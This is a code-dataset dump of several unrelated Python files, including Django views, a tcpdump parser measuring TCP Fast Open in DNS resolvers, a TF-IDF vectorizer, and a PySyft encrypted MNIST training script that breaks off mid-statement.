blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7b5e84aa6a7c4f42ef55fe9cce9e91ab83974836 | def828a9a90a35db9d6659d190ab96209c1b3e07 | /home/views.py | 242be66654ed56550b43a4c5643aab849ba87fa3 | [] | no_license | bglynch/trydjango | 1ccf41328142ab00a06ba587c34da5f911cd37c9 | 6e6b14dee9ef18cd86c3984dadff0091d1283907 | refs/heads/master | 2020-03-20T00:45:04.444662 | 2018-06-13T12:06:10 | 2018-06-13T12:06:10 | 137,054,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py | from django.shortcuts import render
from .models import Author
# Create your views here.
def get_index(request):
authors = Author.objects.all()
return render(request, 'home/index.html', {'authors': authors}) | [
"bglynch17@gmail.com"
] | bglynch17@gmail.com |
62526de5c41406d7c4d2c400d9630f6f77f8a84a | 155b365fb459caff5f57f9e5eb55a26895a016cd | /evento_01/evento_01/urls.py | 291e0231fe3e480d4a9dcaeb87cb9442753711cd | [] | no_license | Claison/EVENTO | a43fa39eb3ea4fdd29c4c9ffd858b6e20be1c02b | 61b97f980f7cd77b4de92088c6601378a520ea86 | refs/heads/master | 2021-06-25T18:55:51.229559 | 2017-09-12T00:59:17 | 2017-09-12T00:59:17 | 103,141,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 970 | py | """evento_01 URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from django.contrib import admin
from evento_trabalho1.views import listaEvento
from evento_trabalho1.views import get_evento_byID
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^eventos/$', listaEvento,name='listaEvento'),
url(r'^eventos/([0-9]{1})/', get_evento_byID),
]
| [
"30608657+Claison@users.noreply.github.com"
] | 30608657+Claison@users.noreply.github.com |
1a37bd84c5c393aea5ef676343ab97d2c5aee110 | 5d0a956acd40aecff1bbea2692f4d8cc916f0f6d | /tfo/recursive_auth/tfo_enabled_parser_tcpdump.py | 3e29293deb31619c1ee79a0e1c6386a86dc7bf04 | [
"BSD-2-Clause"
] | permissive | byu-imaal/dns-privacy-conext19 | 31cf692efb72164e127e2f135b2a3e657113f467 | 5e48592341390744aa2ec38bd11722cbd22bfe36 | refs/heads/master | 2020-07-24T10:11:59.297463 | 2019-10-16T22:22:33 | 2019-10-16T22:22:33 | 207,890,959 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,557 | py | """
Checks to see if resolvers send data in their SYN
Parses output pcap from `tfo_enabled_issuer.py` abd outputs a list of json objects
Used to identify which IPs had the TFO flag set when querying the authoritative server
"""
__author__ = "Jacob Davis as part of research at imaal.byu.edu"
import argparse
import subprocess
import shlex
import io
from tqdm import tqdm
import re
import socket
import base64
import json
src_ip = re.compile(r'IP6? (.+)?\.\d+ >')
tcp_flags = re.compile(r'Flags \[(.+?)\]')
tcp_options = re.compile(r'options \[(.+?)\]')
dns_query = re.compile(r'TXT\? (.+) ')
tfo_info = re.compile(r'tfo (.+?),')
def get(pattern, line):
try:
return pattern.search(line).group(1)
except:
return ""
# For reference, json output keys
O_IP = "original_ip"
S_IP = "src_ip"
TFO_S = "tfo_set"
TFO_I = "tfo_info"
SYN_D = "syn_data"
TCP_O = "tcp_opts"
ERR = "error"
json_keys = [O_IP, S_IP, TFO_S, TFO_I, SYN_D, TCP_O, ERR]
def get_og_ip(qname):
def label_to_ip(label):
""" Directly from qsnoop. Converts base32 labels back to IP address """
if len(label) > 7:
return socket.inet_ntop(socket.AF_INET6, base64.b32decode(label + '======'))
else:
return socket.inet_ntop(socket.AF_INET, base64.b32decode(label + '='))
return label_to_ip(qname.split('.')[1].upper())
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Running a series of scapy scans on a list of IPs to look for TFO")
parser.add_argument('input', help="Input file containing a list of IPs")
parser.add_argument('output', help="File to write results to. Default is stdout")
parser.add_argument('keyword', help="Keyword that a qname must include. Used to filter out other packets")
args = parser.parse_args()
tcpdump = subprocess.Popen(shlex.split("tcpdump -nr {}".format(args.input)), stdout=subprocess.PIPE)
non_data_syns = set()
written_results = 0
pbar = tqdm(io.TextIOWrapper(tcpdump.stdout, encoding="utf-8"))
with open(args.output, 'w') as output_file:
for line in pbar:
# print(line)
try:
pbar.set_postfix_str('Written: {}'.format(written_results))
flags = get(tcp_flags, line)
# SYN
if flags == "S":
s_ip = get(src_ip, line)
qname = get(dns_query, line)
if qname == "":
non_data_syns.add(s_ip)
elif args.keyword in qname and qname[0] == "2":
json_out = {key: None for key in json_keys}
json_out[O_IP] = get_og_ip(qname)
json_out[S_IP] = s_ip
json_out[TCP_O] = get(tcp_options, line)
json_out[TFO_S] = bool("tfo" in json_out[TCP_O])
json_out[TFO_I] = get(tfo_info, line)
json_out[SYN_D] = True
output_file.write(json.dumps(json_out) + '\n')
written_results += 1
if s_ip in non_data_syns:
non_data_syns.remove(s_ip)
except Exception as e:
print(e)
print(line)
e.with_traceback()
for ip in non_data_syns:
json_out = {key: None for key in json_keys}
json_out[S_IP] = ip
json_out[SYN_D] = False
output_file.write(json.dumps(json_out) + '\n')
| [
"jacobgb24@yahoo.com"
] | jacobgb24@yahoo.com |
3dd9507f991d960f4966a2df70d53208413a035f | fafb4b5998833c322ea406dafa8181cc1f953066 | /userCheckFermat.py | a06f9819e694b16412623c25cfd000903ff1a6aa | [] | no_license | mahack-gis/Programming_GIS6345 | ed63082e02abe450b232207d08deb4f9f48f5449 | 173db5fc0967bee45221b760d19c81d0bdaa171f | refs/heads/main | 2022-12-22T17:31:49.851474 | 2020-10-05T00:27:24 | 2020-10-05T00:27:24 | 301,254,888 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 890 | py |
# This code requests input from the user to check if Fermat's Last Theorem is true.
# Fermat's Last Theorem says that there are no positive
# integers a, b, c such that an + bn == cn.
def check_fermat(a, b, c, n):
if an + bn == cn:
print(false)
else:
print(true)
value1 = input('Enter a value for a:\n')
#print(value1) testing code
a = int(value1)
value2 = input('Enter a value for b:\n')
#print(value2) testing code
b = int(value2)
value3 = input('Enter a value for c:\n')
#print(value3) testing code
c = int(value3)
value4 = input('Enter a value for n:\n')
#print(value4) testing code
n = int(value4)
an = (a ** n)
bn = (b ** n)
cn = (c ** n)
false = "Holy smokes, Fermat was wrong!"
true = "No, that doesn't work."
print(check_fermat(a, b, c, n))
| [
"noreply@github.com"
] | mahack-gis.noreply@github.com |
f901b5b704cea5bb9a905cd7578871b92f26ecd4 | f59b52d7edbdae647b6c8137198f5386787f70dd | /Python/HW4/Tfidf.py | fc2f907f8b57a5cabd0186b1205bc04872a9eb0d | [] | no_license | alinashchukina/Avito-Analytics-Academy | 667bc178217851d276a77af6ca9b71f65c061c26 | e3074afc8f789745b681d867bc6fe85758cdbf7f | refs/heads/master | 2023-02-05T04:53:50.279237 | 2020-12-27T22:06:39 | 2020-12-27T22:06:39 | 295,599,946 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,522 | py | from Count_vectorizer import CountVectorizer
import numpy as np
class TfidfTransformer():
"""
Transforms matrix with numbers into tf-idf matrix
Has parameter to_round = True by default
"""
def __init__(self, to_round=True):
self.to_round = to_round
def tf_transform(self, count_matrix):
if self.to_round:
return [[round(x/sum(row), 3) for x in row]
for row in count_matrix]
else:
return [[x / sum(row) for x in row]
for row in count_matrix]
def idf_transform(self, count_matrix):
n = len(count_matrix)
idf_matrix = []
for i in range(len(count_matrix[0])):
count = 0
for j in range(n):
if count_matrix[j][i] > 0:
count += 1
if self.to_round:
idf_i = round(np.log((n + 1) / (count + 1)) + 1, 3)
else:
idf_i = np.log((n + 1) / (count + 1)) + 1
idf_matrix.append(idf_i)
return idf_matrix
def fit_transform(self, count_matrix):
tf = self.tf_transform(count_matrix)
idf = self.idf_transform(count_matrix)
if self.to_round:
return [[round(row[i] * idf[i], 3) for i in range(len(row))]
for row in tf]
else:
return [[row[i] * idf[i] for i in range(len(row))]
for row in tf]
class TfidfVectorizer(CountVectorizer, TfidfTransformer):
"""
Transforms corpus of texts into tf-idf matrix
Has parameter to_round = True by default
"""
def __init__(self, lowercase=True, to_round=True):
CountVectorizer.__init__(self, lowercase)
TfidfTransformer.__init__(self, to_round)
def get_feature_names(self):
return super().get_feature_names()
def fit_transform(self, texts):
matrix = CountVectorizer.fit_transform(self, texts)
final_matrix = TfidfTransformer.fit_transform(self, matrix)
return final_matrix
if __name__ == '__main__':
cmatrix = [
[1, 1, 2, 1, 1, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1]
]
transformer = TfidfTransformer()
print(transformer.fit_transform(cmatrix))
corpus = [
'Crock Pot Pasta Never boil pasta again',
'Pasta Pomodoro Fresh ingredients Parmesan to taste'
]
vectorizer = TfidfVectorizer()
print(vectorizer.fit_transform(corpus))
print(vectorizer.get_feature_names())
| [
"noreply@github.com"
] | alinashchukina.noreply@github.com |
40307c43f43f7a883b8709b9b7a14ea74027f427 | 0c1bdb505b6a3b295b4965cda3adf2e0720274ec | /KodolamaczKurs/Prace domowe/Create_date_time_and_datetime_objects.py | 8d4f54c01b3ef1020eb1aa1c559a4c5dd596f292 | [] | no_license | TPSGrzegorz/PyCharmStart | 3786802a5fc62b316ea00904f4f31fe54f21ac71 | ec0e2f23b03ecd3d4a57e2f2fc71914f76ce7bb3 | refs/heads/master | 2022-12-13T17:58:20.817473 | 2020-09-08T15:58:08 | 2020-09-08T15:58:08 | 269,414,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 280 | py | from datetime import datetime, date, time
my_birthday = date(1987, 9, 25)
my_time = time(5, 24, 5)
now = datetime.now()
print(my_birthday)
print(my_time)
print(now)
print('######## Zadanie 2 ########')
dt = datetime.now()
print(dt)
d = dt.date()
print(d)
t = dt.time()
print(t) | [
"grzegorzb@outlook.com"
] | grzegorzb@outlook.com |
781782dc9fc9bab7ca93ae38f17db36d6e004b67 | bae5f696b76af428fb5555c147c4f1bcff1bb62e | /metalearn/examples/evaluate_test_data_envs.py | 1f25c6c717085714ed0519ac4b1425fe888f373f | [
"MIT"
] | permissive | cosmicBboy/ml-research | 1e309f881f9810e7a82a262d625db5d684752705 | 04fd31f68e7a44152caf6eaaf66ab59f136dd8f5 | refs/heads/master | 2021-01-24T09:58:25.662826 | 2020-08-10T22:08:23 | 2020-08-10T22:08:23 | 123,030,133 | 8 | 4 | MIT | 2019-06-29T20:13:37 | 2018-02-26T21:03:02 | Jupyter Notebook | UTF-8 | Python | false | false | 2,129 | py | """Evaluate controller after training."""
import joblib
import pandas as pd
import os
import torch
from pathlib import Path
from metalearn.metalearn_controller import MetaLearnController
from metalearn.inference.inference_engine import CASHInference
from metalearn.task_environment import TaskEnvironment
from metalearn.data_environments import openml_api, sklearn_classification
build_path = Path(os.path.dirname(__file__)) / ".." / "floyd_outputs" / "225"
controller = MetaLearnController.load(build_path / "controller_trial_0.pt")
experiment_results = pd.read_csv(
build_path / "rnn_metalearn_controller_experiment.csv")
base_mlf_path = build_path / "metalearn_controller_mlfs_trial_0"
# get top 10 best mlfs for each data env across all episodes.
best_mlf_episodes = (
experiment_results
.groupby("data_env_names")
.apply(lambda df: (
df.sort_values("best_validation_scores", ascending=False).head(10)))
["episode"]
.reset_index(level=1, drop=True)
)
# a dict mapping datasets to the top 10 mlfs found for those datasets.
best_mlfs = (
best_mlf_episodes.map(
lambda x: joblib.load(base_mlf_path / ("best_mlf_episode_%d.pkl" % x)))
.groupby("data_env_names")
.apply(lambda x: list(x))
.to_dict()
)
sklearn_data_envs = sklearn_classification.envs()
openml_data_envs = openml_api.classification_envs()
torch.manual_seed(10)
task_env = TaskEnvironment(
env_sources=["OPEN_ML", "SKLEARN"],
test_set_config={"OPEN_ML": {"test_size": 0.8, "random_state": 100}},
random_state=100,
enforce_limits=True,
per_framework_time_limit=720,
per_framework_memory_limit=10000,
dataset_names=list(sklearn_data_envs.keys()),
test_dataset_names=list(openml_data_envs.keys()),
error_reward=0,
target_types=["BINARY", "MULTICLASS"])
inference_engine = CASHInference(controller, task_env)
# evaluate controller on test data environments
train_env_results = inference_engine.evaluate_training_data_envs(
n=1, datasets=sklearn_data_envs.keys(), verbose=True)
test_env_results = inference_engine.evaluate_test_data_envs(n=50, verbose=True)
| [
"niels.bantilan@gmail.com"
] | niels.bantilan@gmail.com |
454c8b640d184f49c3a567e4bd2e1c1574e7d7f5 | 0e8a7c5f9740490d51fcdccd175960155836911a | /blog/views.py | a60c378b0d6eae1a542b2c5e22cdfce069488380 | [] | no_license | DickLiu/suorganizer | a2cef8077f4013496b8c51eb604f4197fb60324e | f882b0ff2c2ea1e45ff9d59e78322738333ec91e | refs/heads/master | 2021-01-23T21:49:42.427759 | 2017-12-24T12:43:03 | 2017-12-24T12:43:03 | 83,112,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,279 | py | from django.shortcuts import (render, get_object_or_404, redirect)
from django.core.urlresolvers import reverse_lazy
from django.views.generic import (View,
ArchiveIndexView,
CreateView,
DateDetailView,
YearArchiveView,
MonthArchiveView,
DetailView,
DeleteView)
from core.utils import UpdateView
from .utils import (DateObjectMixin,
AllowFuturePermissionMixin,
PostFormValidMixin)
from .forms import PostForm
from .models import Post
from user.decorators import require_authenticated_permission
class PostList(
AllowFuturePermissionMixin,
ArchiveIndexView):
allow_empty = True
context_object_name = 'post_list'
date_field = 'pub_date'
model = Post
make_object_list = True
paginate_by = 5
template_name = 'blog/post_list.html'
class PostDetail(DateObjectMixin, DetailView):
date_field = 'pub_date'
queryset = (
Post.objects
.select_related('author__profile')
.prefetch_related('startups')
.prefetch_related('tags')
)
@require_authenticated_permission(
'blog.add_post')
class PostCreate(PostFormValidMixin,
CreateView):
form_class = PostForm
model = Post
@require_authenticated_permission(
'blog.change_post')
class PostUpdate(PostFormValidMixin,
DateObjectMixin,
UpdateView):
date_field = 'pub_date'
form_class = PostForm
model = Post
@require_authenticated_permission(
'blog.delete_post')
class PostDelete(DateObjectMixin, DeleteView):
date_field = 'pub_date'
model = Post
success_url = reverse_lazy('blog_post_list')
class PostArchiveYear(
AllowFuturePermissionMixin,
YearArchiveView):
model = Post
date_field = 'pub_date'
make_object_list = True
class PostArchiveMonth(
AllowFuturePermissionMixin,
MonthArchiveView):
model= Post
date_field = 'pub_date'
month_format = '%m'
| [
"495100061dick@gmail.com"
] | 495100061dick@gmail.com |
db4c205a1c301818753f25df685020906cb5d83c | 7dccf283800b0b47aece8dc7f0c209f5fea527a2 | /ROCC/fitted_Q_iteration/fitted_Q_agents.py | 20ceb89aad9f568488536eed458b0c1b942392ae | [
"MIT"
] | permissive | ucl-cssb/ROCC | 4e713f513a96390c64df23eb414d8a8e374431cb | e7491672bcafc0fac08fe750829e4fac2805d35a | refs/heads/master | 2021-07-10T14:53:31.150305 | 2020-11-17T09:58:01 | 2020-11-17T09:58:01 | 218,557,979 | 13 | 1 | null | 2020-11-17T09:57:37 | 2019-10-30T15:20:47 | Python | UTF-8 | Python | false | false | 10,912 | py | import sys
import os
import numpy as np
import tensorflow as tf
import math
import random
from tensorflow import keras
'''
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
'''
import matplotlib.pyplot as plt
class FittedQAgent():
'''
abstract class for the Torch and Keras implimentations, dont use directly
'''
def get_action(self, state, explore_rate):
'''
Choses action based on enivormental state, explore rate and current value estimates
Parameters:
state: environmental state
explore_rate
Returns:
action
'''
if np.random.random() < explore_rate:
action = np.random.choice(range(self.layer_sizes[-1]))
else:
values = self.predict(state)
self.values.append(values)
action = np.argmax(values)
assert action < self.n_actions, 'Invalid action'
return action
def get_inputs_targets(self):
'''
gets fitted Q inputs and calculates targets for training the Q-network for episodic training
'''
inputs = []
targets = []
# DO THIS WITH NUMPY TO MAKE IT FASTER
for trajectory in self.memory:
for transition in trajectory:
# CHEKC TARGET IS BUILT CORRECTLY
state, action, cost, next_state, done = transition
inputs.append(state)
# construct target
values = self.predict(state)
next_values = self.predict(next_state)
assert len(values) == self.n_actions, 'neural network returning wrong number of values'
assert len(next_values) == self.n_actions, 'neural network returning wrong number of values'
#update the value for the taken action using cost function and current Q
if not done:
values[action] = cost + self.gamma*np.max(next_values) # could introduce step size here, maybe not needed for neural agent
else:
values[action] = cost
targets.append(values)
# shuffle inputs and target for IID
inputs, targets = np.array(inputs), np.array(targets)
randomize = np.arange(len(inputs))
np.random.shuffle(randomize)
inputs = inputs[randomize]
targets = targets[randomize]
assert inputs.shape[1] == self.state_size, 'inputs to network wrong size'
assert targets.shape[1] == self.n_actions, 'targets for network wrong size'
return inputs, targets
def fitted_Q_update(self, inputs = None, targets = None):
'''
Uses a set of inputs and targets to update the Q network
'''
if inputs is None and targets is None:
inputs, targets = self.get_inputs_targets()
#
#tf.initialize_all_variables() # resinitialise netowrk without adding to tensorflow graph
# try RMSprop and adam and maybe some from here https://arxiv.org/abs/1609.04747
self.reset_weights()
history = self.fit(inputs, targets)
#print('losses: ', history.history['loss'][0], history.history['loss'][-1])
return history
def run_episode(self, env, explore_rate, tmax, train = True, remember = True):
'''
Runs one fitted Q episode
Parameters:
env: the enirovment to train on and control
explore_rate: explore rate for this episodes
tmax: number of timesteps in the episode
train: does the agent learn?
remember: does the agent store eperience in its memory?
Returns:
env.sSol: time evolution of environmental states
episode reward: total reward for this episode
'''
# run trajectory with current policy and add to memory
trajectory = []
actions = []
#self.values = []
state = env.get_state()
episode_reward = 0
self.single_ep_reward = []
for i in range(tmax):
action = self.get_action(state, explore_rate)
actions.append(action)
next_state, reward, done, info = env.step(action)
#cost = -cost # as cartpole default returns a reward
assert len(next_state) == self.state_size, 'env return state of wrong size'
self.single_ep_reward.append(reward)
if done:
print(reward)
# scale populations
transition = (state, action, reward, next_state, done)
state = next_state
trajectory.append(transition)
episode_reward += reward
if done: break
if remember:
self.memory.append(trajectory)
if train:
self.actions = actions
self.episode_lengths.append(i)
self.episode_rewards.append(episode_reward)
if len(self.memory[0]) * len(self.memory) < 100:
#n_iters = 4
n_iters = 4
elif len(self.memory[0]) * len(self.memory) < 200:
#n_iters = 5
n_iters = 5
else:
n_iters = 10
#n_iters = 0
for _ in range(n_iters):
self.fitted_Q_update()
#env.plot_trajectory()
#plt.show()
return env.sSol, episode_reward
def neural_fitted_Q(self, env, n_episodes, tmax):
'''
runs a whole neural fitted Q experiment
Parameters:
env: environment to train on
n_episodes: number of episodes
tmax: timesteps in each episode
'''
times = []
for i in range(n_episodes):
print()
print('EPISODE', i)
# CONSTANT EXPLORE RATE OF 0.1 worked well
explore_rate = self.get_rate(i, 0, 1, 2.5)
#explore_rate = 0.1
#explore_rate = 0
print('explore_rate:', explore_rate)
env.reset()
trajectory, reward = self.run_episode(env, explore_rate, tmax)
time = len(trajectory)
print('Time: ', time)
times.append(time)
print(times)
def plot_rewards(self):
'''
Plots the total reward gained in each episode on a matplotlib figure
'''
plt.figure(figsize = (16.0,12.0))
plt.plot(self.episode_rewards)
def save_results(self, save_path):
'''
saves numpy arrays of results of training
'''
np.save(save_path + '/survival_times', self.episode_lengths)
np.save(save_path + '/episode_rewards', self.episode_rewards)
def get_rate(self, episode, MIN_LEARNING_RATE, MAX_LEARNING_RATE, denominator):
'''
Calculates the logarithmically decreasing explore or learning rate
Parameters:
episode: the current episode
MIN_LEARNING_RATE: the minimum possible step size
MAX_LEARNING_RATE: maximum step size
denominator: controls the rate of decay of the step size
Returns:
step_size: the Q-learning step size
'''
# input validation
if not 0 <= MIN_LEARNING_RATE <= 1:
raise ValueError("MIN_LEARNING_RATE needs to be bewteen 0 and 1")
if not 0 <= MAX_LEARNING_RATE <= 1:
raise ValueError("MAX_LEARNING_RATE needs to be bewteen 0 and 1")
if not 0 < denominator:
raise ValueError("denominator needs to be above 0")
rate = max(MIN_LEARNING_RATE, min(MAX_LEARNING_RATE, 1.0 - math.log10((episode+1)/denominator)))
return rate
class KerasFittedQAgent(FittedQAgent):
def __init__(self, layer_sizes = [2,20,20,4]):
self.memory = []
self.layer_sizes = layer_sizes
self.network = self.initialise_network(layer_sizes)
self.gamma = 0.9
self.state_size = layer_sizes[0]
self.n_actions = layer_sizes[-1]
self.episode_lengths = []
self.episode_rewards = []
self.single_ep_reward = []
self.total_loss = 0
self.values = []
def initialise_network(self, layer_sizes):
'''
Creates Q network
'''
tf.keras.backend.clear_session()
initialiser = keras.initializers.RandomUniform(minval = -0.5, maxval = 0.5, seed = None)
positive_initialiser = keras.initializers.RandomUniform(minval = 0., maxval = 0.35, seed = None)
regulariser = keras.regularizers.l1_l2(l1=0.01, l2=0.01)
network = keras.Sequential([
keras.layers.InputLayer([layer_sizes[0]]),
keras.layers.Dense(layer_sizes[1], activation = tf.nn.relu),
keras.layers.Dense(layer_sizes[2], activation = tf.nn.relu),
keras.layers.Dense(layer_sizes[3]) # linear output layer
])
network.compile(optimizer = 'adam', loss = 'mean_squared_error') # TRY DIFFERENT OPTIMISERS
return network
def predict(self, state):
'''
Predicts value estimates for each action base on currrent states
'''
return self.network.predict(state.reshape(1,-1))[0]
def fit(self, inputs, targets):
'''
trains the Q network on a set of inputs and targets
'''
history = self.network.fit(inputs, targets, epochs = 300, verbose = 0) # TRY DIFFERENT EPOCHS
return history
def reset_weights(model):
'''
Reinitialises weights to random values
'''
sess = tf.keras.backend.get_session()
sess.run(tf.global_variables_initializer())
def save_network(self, save_path):
'''
Saves current network weights
'''
self.network.save(save_path + '/saved_network.h5')
def save_network_tensorflow(self, save_path):
'''
Saves current network weights using pure tensorflow, kerassaver seems to crash sometimes
'''
saver = tf.train.Saver()
sess = tf.keras.backend.get_session()
path = saver.save(sess, save_path + "/saved/model.cpkt")
def load_network_tensorflow(self, save_path):
'''
Loads network weights from file using pure tensorflow, kerassaver seems to crash sometimes
'''
saver = tf.train.Saver()
sess = tf.keras.backend.get_session()
saver.restore(sess, save_path +"/saved/model.cpkt")
def load_network(self, load_path): #tested
'''
Loads network weights from file
'''
try:
self.network = keras.models.load_model(load_path + '/saved_network.h5') # sometimes this crashes, apparently a bug in keras
except:
self.network.load_weights(load_path + '/saved_network.h5') # this requires model to be initialised exactly the same
| [
"zcqsntr@ucl.ac.uk"
] | zcqsntr@ucl.ac.uk |
bbd8a1b955771a4160746c6c140fa4361f92d898 | f504d13891eef0a140dd9ac8ade4f5c85613611f | /venv/Scripts/pip3-script.py | d0b7e5bda7bf72aae68c7a63740bd1df19431079 | [] | no_license | owloliviakelly/imagesize | 8674ee430de971c76e9e22e5da0a38ae432df615 | 5b0270aeae50722ad45bf97a160c5b7c504726c9 | refs/heads/master | 2020-05-17T19:47:27.912769 | 2019-04-28T15:30:21 | 2019-04-28T15:30:21 | 183,925,769 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 414 | py | #!C:\Users\Anna\PycharmProjects\untitled4\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3')()
)
| [
"50046877+owloliviakelly@users.noreply.github.com"
] | 50046877+owloliviakelly@users.noreply.github.com |
5249a6811fad92b075afe3535e1eb24bef84ca78 | f2befaae3840bafd181cc712108e3b64caf2696f | /app/portal/horizon/openstack_dashboard/dashboards/settings/user/panel.py | 9b9781eb0b3ae92466380018fce619077f697488 | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] | permissive | F5Networks/f5-adcaas-openstack | 17d5c408d421dcfe542002e1f850b2d9f29f1663 | 02bd8a606215c0fa08b926bac1b092b5e8b278df | refs/heads/master | 2023-08-28T12:09:54.972191 | 2022-08-12T02:03:43 | 2022-08-12T02:03:43 | 164,592,273 | 4 | 23 | Apache-2.0 | 2022-08-12T02:03:44 | 2019-01-08T07:40:35 | Python | UTF-8 | Python | false | false | 863 | py | # Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.utils.translation import ugettext_lazy as _
import horizon
from openstack_dashboard.dashboards.settings import dashboard
class UserPanel(horizon.Panel):
name = _("User Settings")
slug = 'user'
dashboard.Settings.register(UserPanel)
| [
"a.zong@f5.com"
] | a.zong@f5.com |
f8e584f21699ce5bf51c3992ef099f5f3548d4d1 | 52fb627ec952bf647c625f9372581bff4764da76 | /wo_websocket.py | 71f69201f610ea526be8c98ac46edded4b559f1b | [] | no_license | syyunn/smpc-dl | b89071d277347e28979973e734b329f51020a6b0 | 41bd40ef7866062a53fb20bcff994c51f38f38d5 | refs/heads/master | 2020-08-06T00:17:01.474179 | 2019-10-05T16:39:14 | 2019-10-05T16:39:14 | 212,768,083 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,515 | py | import time
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
import syft as sy
hook = sy.TorchHook(torch)
class Arguments():
def __init__(self):
self.batch_size = 64
self.test_batch_size = 64
self.epochs = 10
self.lr = 0.02
self.seed = 1
self.log_interval = 1 # Log info at each batch
self.precision_fractional = 3
args = Arguments()
_ = torch.manual_seed(args.seed)
# simulation functions
def connect_to_workers(n_workers):
return [
sy.VirtualWorker(hook, id=f"worker{i+1}")
for i in range(n_workers)
]
def connect_to_crypto_provider():
return sy.VirtualWorker(hook, id="crypto_provider")
workers = connect_to_workers(n_workers=2)
crypto_provider = connect_to_crypto_provider()
# We don't use the whole dataset for efficiency purpose, but feel free to increase these numbers
n_train_items = 640
n_test_items = 640
def get_private_data_loaders(precision_fractional, workers, crypto_provider):
def one_hot_of(index_tensor):
"""
Transform to one hot tensor
Example:
[0, 3, 9]
=>
[[1., 0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 1., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0., 1.]]
"""
onehot_tensor = torch.zeros(*index_tensor.shape,
10) # 10 classes for MNIST
onehot_tensor = onehot_tensor.scatter(1, index_tensor.view(-1, 1), 1)
return onehot_tensor
def secret_share(tensor):
"""
Transform to fixed precision and secret share a tensor
"""
return (
tensor
.fix_precision(precision_fractional=precision_fractional)
.share(*workers, crypto_provider=crypto_provider,
requires_grad=True)
)
transformation = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
train_loader = torch.utils.data.DataLoader(
datasets.MNIST('../data', train=True, download=True,
transform=transformation),
batch_size=args.batch_size
)
private_train_loader = [
(secret_share(data), secret_share(one_hot_of(target)))
for i, (data, target) in enumerate(train_loader)
if i < n_train_items / args.batch_size
]
test_loader = torch.utils.data.DataLoader(
datasets.MNIST('../data', train=False, download=True,
transform=transformation),
batch_size=args.test_batch_size
)
private_test_loader = [
(secret_share(data), secret_share(target.float()))
for i, (data, target) in enumerate(test_loader)
if i < n_test_items / args.test_batch_size
]
return private_train_loader, private_test_loader
private_train_loader, private_test_loader = get_private_data_loaders(
precision_fractional=args.precision_fractional,
workers=workers,
crypto_provider=crypto_provider)
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(28 * 28, 128)
self.fc2 = nn.Linear(128, 64)
self.fc3 = nn.Linear(64, 10)
def forward(self, x):
x = x.view(-1, 28 * 28)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
def train(args, model, private_train_loader, optimizer, epoch):
model.train()
for batch_idx, (data, target) in enumerate(
private_train_loader): # <-- now it is a private dataset
start_time = time.time()
optimizer.zero_grad()
output = model(data)
# loss = F.nll_loss(output, target) <-- not possible here
batch_size = output.shape[0]
loss = ((output - target) ** 2).sum().refresh() / batch_size
loss.backward()
optimizer.step()
if batch_idx % args.log_interval == 0:
loss = loss.get().float_precision()
print(
'Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}\tTime: {:.3f}s'.format(
epoch, batch_idx * args.batch_size,
len(private_train_loader) * args.batch_size,
100. * batch_idx / len(private_train_loader),
